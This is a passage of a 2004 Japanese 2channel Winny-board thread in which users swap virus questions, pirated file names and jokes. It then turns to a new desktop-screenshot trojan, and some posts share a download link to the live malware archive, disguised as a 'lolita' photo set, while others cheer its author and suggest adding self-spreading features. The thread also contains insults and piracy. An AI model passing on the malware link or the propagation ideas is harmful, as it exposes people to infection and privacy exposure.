　　|￣￣￣￣￣￣￣￣￣￣￣￣￣ |
　　|＿＿＿＿＿＿＿＿＿＿＿＿＿_|

　　　∧∧
　　（　･ω･）
　＿|　⊃／(＿＿_
／　└-(＿＿＿_／
￣￣￣￣￣￣￣

　＜⌒／ヽ-、_＿_ ＜ｼｸｼｸ
／＜_/＿＿＿＿／
381 名前：[名無し]さん(bin+cue).rar [04/09/20 23:49:32 ID:MII97qGv]: なんかやられたぽいけどどうしていいかわからん！
やばいね。。。。
382 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/20 23:57:41 ID:QpxhU4DL]: 脳細胞が？
383 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 00:01:26 ID:PeBObryp]: >>381
あきらめればー
384 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 00:17:51 ID:zzCMoBJp]: >>381
ん？アップフォルダーにJPGとか勝手に出来てるの？
385 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 00:24:24 ID:QYcixn2/]: >>381
気にしない、気にしない。
人間も風邪ひくだろ。たいていは、ほうっておいたら直る。
誰もキミなんか興味ないって。
386 名前：[名無し]さん(bin+cue).rar mailto:381 [04/09/21 00:58:34 ID:26jKQ6TK]: ぬるぽに感染したらもう入れ直すしかない？
387 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 00:59:48 ID:Am6yVj5+]: >>386
気にしない、気にしない。
人間も風邪ひくだろ。たいていは、ほうっておいたら直る。
誰もキミなんか興味ないって。
388 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 01:00:57 ID:NQ2ccG6A]: うｎ
389 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 01:05:02 ID:ewgN3Zaq]: こいつら情報スレで質問するのかorz
390 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 04:18:44 ID:1AgtokjT]: WinRARでzipファイルの中身を覗こうとしたら
「予期しない書庫の終わりです」って出る時がありますが
zip偽装のウイルスだったってことはありえるんでしょうか？
391 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 04:22:46 ID:Ob38LuoD]: NGID:1AgtokjT
392 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 04:41:18 ID:A/77/Zjy]: >>390
死ねばー
393 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 07:20:26 ID:gkeWQVJo]: 自動実行（窓の手で確認）に「NvCplDaemon」というのが入っているのは正しいのでしょうか？
ウイルスでランダムに作った名前にも思えるのですが自分では判断出来ません。
（いろいろアップデートした後ぐらいに見つけた）
ノートン(LiveUpdata済)で完全スキャン、オンラインスキャンしても未検出でした。
テンプレに書いてあることも確認しました。ウイルスらしい現象は起きてません。
教えてください、お願いします。
394 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 07:39:00 ID:OTnuHmca]: >>393
個別環境依存なものについては、それが入っていようがいまいが、正しいも正しくないも無い。
それが疑うべきものか否か知りたいなら、自動実行されるファイルの実体が何かを調査確認すれば良い。
そのくらい自分でやれ。
395 名前：[名無し]さん(bin+cue).rar [04/09/21 08:19:02 ID:0LVQliwh]: >>363
みつけた以上は、ちゃんと踏んでよ。
問題の「.exe」は、FFFTP.exe。無害。

!!(一般コミック) [二ノ宮知子] のだめカンタービレ第04巻(別スキャン単頁).zip 28,205,885 ee32043b7fe7dd03f72b29052cc692a2
396 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 08:34:22 ID:LErTzGQS]: >>393
ｎVIDIA系グラボの管理ツール
397 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 08:53:34 ID:GIP/dP7o]: >>393
心配なら、VGAドライバを削除しなさい。
398 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 19:01:12 ID:h+5OsQ8n]: Antinny.Gってsvchost.exeに関係した症状出る？
タスクマネージャー開いたらsvchostがいっぱい起動してて怖いんだけど、
これは普通のことだろうか？
399 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 19:08:46 ID:CINLeBhc]: >>398
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ANTINNY.G
一応関係した症状出すみたいだが、svchostはいくつかあってもおかしくは無い。
漏れも４つほどある。
400 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 19:25:02 ID:rBc6YMGm]: Autorun+batに感染してしまって早速テンプレの駆除方法を試そうとしたのですが
マウントした際に焦って脊髄反射でファイルを消してしまったんです。
この場合どう対処したら良いのでしょうか？ご教授お願いします。
401 名前：398 mailto:sage [04/09/21 19:29:16 ID:h+5OsQ8n]: サンクス。俺は６つ。
うーん、一通り駆除はしたんだけどなんか不安だからシステムの復元は無効にしとこうかな。
そっちのほうが危ないかな。
402 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 20:02:14 ID:uyZ9F6OJ]: (ドラマCD)爆裂天使 SUIT CD-3 “天”Amy-11.lzh　ed74776ae946eb13f3bf08c125cf21b1

解凍したら３つもexeファイルが。　あぶねーあぶねー
403 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 20:40:10 ID:3WF2fKD3]: 嘘偽りなく爆裂天使だったと
404 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 20:43:02 ID:k431Nsjg]: しかし地獄行く。
405 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 21:09:34 ID:YJeLXY2I]: もうなんのスレなんだかワカラネ
406 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 21:47:23 ID:vd9Wwl8A]: いままで拡張子がlzhのファイルってまともなのみたことないんだけど

ていうかすでに.lzhで無視リストにいれてるな
407 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 21:49:31 ID:nBwO3wnF]: ウィルス雑談＆相談スレッドつくるか、あきらめる化だな。
408 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 22:06:21 ID:YrabcswT]: 作ったところであまり意味はなさそうだな
亜種に感染したときに一番簡単で安全な対策が再インスコだからな
既出のはトレンドマイクロやシマンテック見てわからんかったらあきらめろでいいし
409 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 22:16:23 ID:cnhAAVmy]: >>400
自分が落としたと思われるエロゲーを再度落としてみて、確認してみれば？
410 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 22:50:33 ID:UiYxUKH4]: >>395
最近のFFFTPには女性の悲鳴みたいなWAVEリソースが埋め込まれているのか？
411 名前：[名無し]さん(bin+cue).rar [04/09/21 23:17:25 ID:3lHKQVDf]: 「CROSS†CHANNEL NOCD化パッチ」というﾌｧｲﾙをDLしてexeを起動したら
妙なカウントが30くらいから始まって急いで消そうと頑張るのだがキャンセルボタンは近づくと逃げました。結局強制終了でなんとかなりました
それはウィルス等の類ですか？↑分かりにくい説明でしたがカウントが0になるとどうなるかとか教えてください

乱文すみません
412 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:22:15 ID:44EMXIte]: >>411
ばーか
413 名前：[名無し]さん(bin+cue).rar [04/09/21 23:22:23 ID:uQLhGl2H]: >>411
は？NOCD化パッチなんだからNOCD化されるに決まってんじゃん
おまえバカ？
414 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:25:53 ID:rBc6YMGm]: >>409
ありがとうございます。盲点でしたｗ
大分テンパってたせいか気付きませんでした。
そうか、もう一回ウイルスを落とせばいいんダ。
415 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:26:54 ID:FI5JQism]: >>412
駒田の真似か？
416 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:32:42 ID:NQ2ccG6A]: 止めようとしてキャンセル（と書かれたボタン）押そうとした時点で
お前はnyやるﾚﾊﾞﾙじゃない
417 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:33:41 ID:NQ2ccG6A]: っつーかカウント0前に強制終了しようとしまいともう既に手遅れかと
418 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/21 23:34:44 ID:YrabcswT]: >411
もうどうしようもない
不安ならさっさと再インスコしろ
419 名前：[名無し]さん(bin+cue).rar [04/09/21 23:57:42 ID:bwzqiaf3]: nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnキンタマ
420 名前：[名無し]さん(bin+cue).rar [04/09/22 00:13:32 ID:yTZI13Ma]: 現在でてるANTINNYウイルス（亜種も含む）で、デスクトップ上の
マイドキュメントやゴミ箱からも情報をとるものはあるのでしょうか。
421 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:29:39 ID:GLE7KMbZ]: ageruna baka
422 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:29:42 ID:XeEl/z1A]: わからない。たとえあったとしても…
とられてこまる情報をマイドキュメントなどに保存する愚か者はこのスレにいないので問題ない。
423 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:39:44 ID:tsO6tEnU]: おい、そんな事言ったら>>420がかわいそうだろ
424 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:43:45 ID:zxSY1Bfi]: すみませｎ
antinny.hってどんな症状なんすか？？
知ってる人おしえてください
425 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:44:03 ID:y92j+6hG]: >>416

　　　　　　　　　「ﾚﾊﾞﾙ」　ってなんですか
426 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:44:10 ID:iDhsW6nH]: 「俺のマイピクチャ」まだーー？
427 名前：[名無し]さん(bin+cue).rar [04/09/22 00:48:48 ID:BSHES9c3]: >>420
>>424
おまえの質問に答えること　それ自体は容易い　簡単だ
感染した時の症状はこれこれこう　こういう問題が起き
何時間後発動し　隔離は･･････？　駆除は？　再インスコは････？
そんな話はいくらでもできる
しかし　今　俺がそんな話を　仮にしたとしても
その真偽はどうする･･････？
真偽などどうでもいいから　聞きたいというのか････？
ククク･･････
すでにこのスレに書き込んでいるおまえには　オレの話の裏をとる術はない
オレが何を語ろうと　結局ただそれを　盲目的に信じるしか道はない
つまり　どんないい話を聞いても　それは単なる気休めにしかすぎないってことだ
違うか･･････？
428 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:51:46 ID:tsO6tEnU]: >>426
よし、俺が流してやる
429 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 00:53:30 ID:zLHcnXpB]: >>425
え？ﾚﾊﾞﾙ知らないの？
ちょっと君　やばいな
公安にマークされるよ
430 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 01:04:53 ID:IONPryem]: >>425
((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ
431 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 01:46:54 ID:8QR9/+v0]: >>402
.exe入ってるファイルなんて山ほどあるんだから、
「これに.exe入ってました」という報告はイラネ
ちゃんと実行させてから来い
432 名前：393 mailto:sage [04/09/22 02:06:37 ID:3vM35NCY]: >>396-397
情報ありがとうございます。
一応アンインストールして入れ直してみます。

>>394
ごめんなさい。
433 名前：` ◆NgatoX7m1. [04/09/22 02:31:33 ID:HYd9vI3J]: 「exe」←コレ、なんて読むのぉ？

イグジ？？
434 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 02:45:20 ID:DFcwEF7M]: いーえっくすいー
435 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 02:46:46 ID:cHFtlyXw]: エグゼだろ
436 名前：[名無し]さん(bin+cue).rar [04/09/22 02:49:11 ID:vbBsFXrI]: ロックマン？
バルドフォース？
437 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 02:58:06 ID:ETFJAFZu]: >>433
.avi 読み方: エーブイアイ
.bmp 読み方: ビーエムピー
.exe 読み方: エグゼ
.gif 読み方: ジフ
.html 読み方: エイチティーエムエル
.jpg 読み方: ジェイペグ
.mpeg 読み方: エムペグ
.pdf 読み方: ピーディーエフ
.wav 読み方: ワブ
.zip 読み方: ジップ

ttp://support.microsoft.com/default.aspx?scid=/directory/worldwide/ja/glossary/
438 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 03:01:32 ID:zVcTvScF]: >>437
＞.gif 読み方: ジフ
＞.wav 読み方: ワブ
ギフ、ウェイブだと思ってたOTL
439 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 03:04:42 ID:cHFtlyXw]: 別にウェイブでもいいだろ。
.bmpとか普通にビットマップって読んでるしな
440 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 04:20:17 ID:xUMasHO2]: ＞exe 読み方: エグゼ

「エグいぜ！」　　と読んでいた・・・
441 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 04:34:30 ID:MVU/5bip]: >.exe
ここの方言では「ういるす」と読む。
あまり知られてないようだが・・・
442 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 04:52:00 ID:zLHcnXpB]: >avi 読み方: エーブイアイ

俺は「アヴィ」と呼んでた。決して「アビ」ではない。
言っておくが唇は血が滲むくらい噛んで読めよ。
443 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 05:15:36 ID:mrLzYwy8]: 口内炎になっちゃいます。
つーかもうなりました。

俺の場合、アヴィとビットマップとウェーブくらいかな、違うところは。
444 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 05:29:48 ID:F/drtkw3]: >>443
房黙
445 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 08:34:56 ID:GLUesFjZ]: イグゼと読んでるなあ
あとギフでもいいはず
446 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 11:14:24 ID:j/18rTjQ]: 岐阜みたいでナウい
447 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 13:29:49 ID:jzo10T46]: お　君はヤングだね　おいらもヤングさ　フィーバーしようぜ！
448 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 13:38:57 ID:Xh7RFvqN]: 岐阜はナウでイカス
449 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:06:07 ID:ukACuFTt]: >>437
M$もわざわざそんなもん作ってんだねｗ
exeをエグゼってのはなんかゲームの世界みたいだな・・・
450 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:22:35 ID:CiebCEfA]: aviはアビだろ
451 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:38:05 ID:3USje0wW]: UINGUGANDAMU
452 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 14:55:20 ID:9gdQfsyR]: PC初心者板じゃないんだからほどほどに
453 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 15:05:05 ID:dQ12lTaF]: じゃあお前らexeをかなで打ってみろ

えぇ
454 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 15:05:16 ID:WgF4Qzwt]: 感染してからここに駆け込んで助けを求める初心者がいるがなー。
455 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 15:18:16 ID:G5rN2r09]: music4.2ch.net/test/read.cgi/musicnews/1095563850/15-18
これってshare利用者を狙ったウイルス？
456 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:26:42 ID:9wErnaQd]: >>455
513 名前：[名無し]さん(bin+cue).rar　[sage]　投稿日：04/09/22(水) 05:09:53 ID:IJUa2BF4
【ＯＳ】Windows XP SP2に2種類の脆弱性
　pc5.2ch.net/test/read.cgi/pcnews/1093226380/
特撮エロを
　tmp4.2ch.net/test/read.cgi/download/1095345507/
次世代共有PS2ソフト“食卓塩”開発
　tmp4.2ch.net/test/read.cgi/download/1093715748/
【本物】WINNYお宝ファイル真贋スレ【偽物】
　tmp4.2ch.net/test/read.cgi/download/1093786275/
エロゲー板ローカルルール申請
　qb5.2ch.net/test/read.cgi/operate/1094443286/
一般海外生活板ローカルルール申請
　qb5.2ch.net/test/read.cgi/operate/1095512881/
【あわや】OFF板コテが20娘をﾅｶ出しﾊﾒ撮り【妊娠】
　live15.2ch.net/test/read.cgi/festival/1095597679/
【植物】ケチャップ用トマトの甘味遺伝子LIN5について
　news16.2ch.net/test/read.cgi/scienceplus/1095696790/
初級ネットワーク板ローカルルール申請
　qb5.2ch.net/test/read.cgi/operate/1095695740/

被害者100名強
　やっちゃってないか心配な人へ
　list.zip 5,728 6b1ab91ddc26ac315a5592098cc4d806db9a476c
457 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:28:15 ID:pfnybTQU]: >>455
ここはｎｙスレだぞShareはほっときゃいいんだよ。
どうしても聞きたいんならShareスレへ池。
458 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:36:01 ID:jzo10T46]: >>454
でも　そのｎｙ初心者うぃ～虐めるんで、寄り付かなくなってるし・・・
459 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 16:59:26 ID:9GkE2lGq]: ヌルポースもおさまり、とくに新種も亜種もでてないんだから
スレが死んでてもかまわない
今更キンタマに感染しました～っていうのを聞いててもしょうがないだろ
460 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 17:17:22 ID:jzo10T46]: でも大抵　質問してくるのは指摘通りの新種、亜種以外なら圧倒的に
初心者による既存ウイルス被害者だろ？

したがって散々既出とはいえ、敷居を高くしすぎるのもどうかと思ったんだよね。
質問に答えるかどうかは　あくまで善意と個人の資質の問題だからさ。
いやなら無視していればよいわけだし・・・
無駄レスの可能性があっても　それは許容していったほうがよくね？
もっとも速報系スレなら　まずいだろうけどさ。
461 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 18:38:20 ID:DD8VmRNY]: >>453
いさい
462 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 19:18:30 ID:jIZTPKHy]: 久しぶりにダウン版来たけど
ウィルスやらなにやら大変になったねぇ・・・
463 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 20:00:51 ID:6gk9JVQ6]: そろそろ面白いことになるから覚悟しとけよおまいら
464 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 20:08:02 ID:AmnzJVzB]: 犯罪予告ﾃﾞｨｽｶ？
465 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:17:01 ID:bZGJWpm+]: 感染するとデスクトップをキャプされて、それを定期的にうｐロダにあげて、
その画像へのリンクを特定スレに自動書き込みするウィルスが
はやってるらしい。みんな気をつけて！

エロアニメ動画をみている状態のデスクトップとか晒されててﾜﾛﾀ

キャプチャされたデスクトップがウィルスによって晒され続けてるスレ
角二　【うｐろだ】アップローダー案内所11【アプロダ】
idol.bbspink.com/test/read.cgi/ascii2d/1095176627/192-

関連スレ
セキュリティ板　ウィルス情報＆質問　総合スレッド☆Part24
pc5.2ch.net/test/read.cgi/sec/1094383672/412-

キンタマのWeb版みたいなもんなの？
466 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:35:46 ID:9rRhf0vV]: >>465
こりゃ最凶だ
467 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:36:30 ID:XwcsDIdF]: キンタマ改造版だな。
節穴機能が付いてないだけましか。
そのトロイどこかで入手できないもんかなァ。激しく解析してみたいぞ(w
Webとかjpeg感染タイプが出てくると、結構脅威だろーな。
nyだけじゃなくて、世界的に笑える
468 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:37:25 ID:koLWP3nB]: これスレが新しくなっても自動書き込みするようになってるんだな…
469 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:40:54 ID:yMfO9itd]: >>467
ほれ
つttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
中身はロリータ写真集だｗ
470 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:41:25 ID:Fk55VY7i]: >>467
苺のアプロダ・1MBの1360.zipがウイルスだ
471 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:42:01 ID:JgXMRF3E]: >>460
答える人に対しては誰も文句は言ってないはず。
質問に答える意欲と知識を持った人が質問に居合わせれば
今までもどんな駄レスにだって普通に返答はあった。
何でもオーライな空気なんて百害有って一利無し。必要ない。
472 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:43:34 ID:XwcsDIdF]: しかし、新スレ追跡してるけど、強力だなぁ…
何に埋められてるんだろ。ほしいぃ
473 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:49:41 ID:fz84/HQL]: up.isp.2ch.net/upload/c=03okari/index.cgi
ここで直接見れるよ＞キャプ
474 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:50:31 ID:XwcsDIdF]: 469-470
サンクスコ、解析してみる。
ご親切に、フォルダアイコンになってるね。
バイナリエディタで覗いてみただけでも、相当作りこまれてるのがわかる
「そんなスレッド／板ありません」を検知して、別スレに飛ぶ機能もある
おーい、こいつメール砲機能あるみたいだぞ

キンタマ亜種とか改造版じゃなくて、まったく新規に作ってるっぽいな。
しかも、かなり念入り。詳しくはもうちょっとお待ちを…
475 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:51:07 ID:6gk9JVQ6]: 432 ：名無しさん＠お腹いっぱい。：04/09/22 21:44:41
>>412

169 ：名無したん(;´Д｀)ﾊｧﾊｧ：04/09/22 21:39:41 ID:LP+Ly6X1
23 ：名無しさん＠ｺﾞｰｺﾞｰｺﾞｰｺﾞｰ！：04/09/22 21:37:54 ID:kcrfEebX
実行結果：

追加されるファイル：
windows\shellsystem.exe 678kB

追加されるレジストリ：
HKEY_USER\.Default\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
shellsystem.exe :='C:\Windows\shellsystem.exe'
476 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:53:32 ID:XwcsDIdF]: ちなみに、ノートン先生最新版では検出せず。
すぐに回線切れよ＞かかった香具師
477 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:54:19 ID:MORRrkle]: >>474
フォルダと思ってWクリックしたら、exe実行ですか・・・。
解析乙です。報告お待ちしてます。
478 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:54:33 ID:9rRhf0vV]: これって、shareﾌｼｱﾅ晒しage→shareクリップボード晒し→苺デスクトップ晒し

って進化？していったのか？
479 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:58:33 ID:TGFooCp8]: >>478
同時多発っぽい
480 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:58:58 ID:F8v+LexZ]: すげーな作者！GJ！
481 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:59:18 ID:0Y8OIFWt]: Shareのってうさんくさいパッチあてるとなるやつか？
482 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 21:59:25 ID:zRg+AmZG]: 一度流れたら半永久的に削除不能なキンタマに比べたら救いがある？
483 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:00:56 ID:vLbTjc4V]: >>479
2ちゃん同時多発テロか？
484 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:02:59 ID:zasm0Yrz]: exe圧縮してないからバイナリエディタとリソースエディタで
中見られるな。
これ改造も容易だし、亜種出回りそうだな。
ウイルスチェッカー制作企業とかに報告が行けばいいが。
485 名前：[名無し]さん(bin+cue).rar [04/09/22 22:03:06 ID:F8v+LexZ]: この作者の優しいとこはうｐロダをわざわざ2CHロダにしてくれたとこだな。
ここ消せないけど2chプロバイダ入ってないやつは24時間で見えなくなるし。

あやしいわーるどのうｐロダとかに画像うpされるようになったら最悪じゃない？？
あそこって結構長持ちだし自分で削除できないしime.nu経由で開いたらブラクラになるんでしょ？？

作者見てる～？
486 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:03:33 ID:WK8P1uKu]: おまいらって、初心者には厳しいが新種にはホントに嬉々とするよな(･∀･)
487 名前：[名無し]さん(bin+cue).rar [04/09/22 22:04:59 ID:tOdOsShM]: >>482
誰かが纏めたのをnyに流しそう
488 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:07:17 ID:0Y8OIFWt]: 感染源はどこなんだ？
489 名前：[名無し]さん(bin+cue).rar [04/09/22 22:08:11 ID:OFqE6GX2]: 私は苺で違法ダウンロードばかりしている犯罪者です
news13.2ch.net/test/read.cgi/news/1095854900/
【洒落】キンタマウィルスのWeb版
news13.2ch.net/test/read.cgi/news/1095858175/
490 名前：[名無し]さん(bin+cue).rar [04/09/22 22:08:31 ID:1t6CyIj6]: だれか単独スレ立てろ
491 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:11:39 ID:oYMFNm7J]: それにしても何でこんな大勢がｸﾘｯｸしちゃったﾜｹ？
そんなに魅力的なﾌｧｲﾙだったのか？
492 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:12:35 ID:F8v+LexZ]: （写真集）（ロリータ）水原友里
（写真集）（ロリータ）相田加奈子
（写真集）（ロリータ）河瀬菜美

ってファイル名だったらしいよ
493 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:12:41 ID:g1+bfA34]: ロリファイルは大人気でしょう
494 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:14:27 ID:JgXMRF3E]: >>491
トリビアスレにファイルのリンク貼った奴がいたみたいだが
495 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:14:47 ID:IuQLM0ec]: >>491

>>469
496 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:15:17 ID:zasm0Yrz]: >>492
正確にはその全ての尻に.exeがついていたがな。
エクスプローラーの設定で、拡張子見えるようにしておかない奴らが
いかにも踏む感じの奴だった。アイコンがフォルダだったし。
497 名前：[名無し]さん(bin+cue).rar [04/09/22 22:15:52 ID:lbxNYg0M]: ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip

の中にある　EXEのフォルダをクリックしたら感染

注意！('A`)9m
498 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:16:46 ID:cHFtlyXw]: 俺でさえも(ry　が予兆だったって事？
499 名前：469 mailto:sage [04/09/22 22:17:05 ID:yMfO9itd]: >>495
ｽﾏﾝ
俺は別に引っ掛ける気は無かったんだが、
>>467へのレスなわけだし。

結局おまいも、引っかかったんだろ？
500 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:17:29 ID:IuQLM0ec]: 10 名前：番組の途中ですが名無しです：04/09/22 22:09:56 ID:VXSuEMJY
これと同じウィルスが数日前に放尿スレにあったんだよな。
ﾉｰﾄﾝで検出されないってのは怖いな。

767 名前：私は放尿絵で興奮する変態です[G4zsGnQECv:40回目] 投稿日：04/09/18(土) 15:10:02 ID:GhekIZuS

v.isp.2ch.net/up/63ea6ede343b.jpg
501 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:17:30 ID:EQvNm7YP]: これ苺とかってアプロダに上げられた>>469から感染したんだろ？
K札動けばアップした奴（から作者まで）の特定が可能なんじゃね？
502 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:19:48 ID:3zEu3lCZ]: >>497
ブラクラ・ウイルス張るときは「ht」まで抜いてくれますかね
503 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:21:36 ID:l67SMSG4]: アップローダに上げてるってことは普通に考えれば自己感染もアップローダ経由になるんじゃねーの
504 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:24:38 ID:F8v+LexZ]: ウイルスだって解ってるURL貼るときは

htt://strawberry.web-sv.com/cgi/up/ia/up1360.zip

にしたほうがいいんじゃないの？
これなら大抵の専用ブラウザでもリンクできないでしょ？
505 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:24:43 ID:Pp/pgXRx]: 盛り上がらないニュ速板。
506 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:26:57 ID:rr+OCUUx]: うｐろだ死んだ
507 名前：[名無し]さん(bin+cue).rar [04/09/22 22:28:02 ID:1t6CyIj6]: うｐろだが重すぎて画像見づらいから盛り上がらん。

キンタマみたいにファイル詰め合わせ(ウィルスつき)だったら
２次感染もあってすごいことになるのに
508 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:29:57 ID:Sxm2sX2b]: >>492
>>469の中身は↓だった。同じ内容の.exeファイルが三つ。

(写真集)(ロリータ)水原友里.exe
(写真集)(ロリータ)相田香奈子.exe
コピー～(写真集)(ロリータ)河瀬菜美.exe
509 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:35:19 ID:0Y8OIFWt]: 被害者どれくらいでてんだろ？
510 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:36:25 ID:04BG488z]: どうでもいい
511 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:36:28 ID:MORRrkle]: まぁ、普通にnyにも流れるだろうな、ってか既に流れてるかもしれんね。
まぁ、感染方法は古典的だけど、webに晒すと言うのが斬新かな。
512 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:36:31 ID:31YwwZCa]: www2j.biglobe.ne.jp/~tatuta/cgi-bin/ansbbs.cgi?name=comic&qes=I_am_the_Winny-user
513 名前：[名無し]さん(bin+cue).rar mailto:sage [04/09/22 22:37:02 ID:mrLzYwy8]: ｳﾋｮｰ新型ｷﾀ━━━━（ﾟ∀ﾟ）━━━━!!!!!!
オラなんだかﾜｸﾜｸしてきたぞ！

画像うpだけじゃなくて感染機能もあればいいのだがな
ウイルス本体と軽いファイル(kakikomi.txtとかお気に入りとか)をアーカイブしたモノもアプロダに上げてたらマジ大騒ぎになると思うんだが
ろだのアドレスを無作為に書き込んだり2ch外にも書き込んだり……
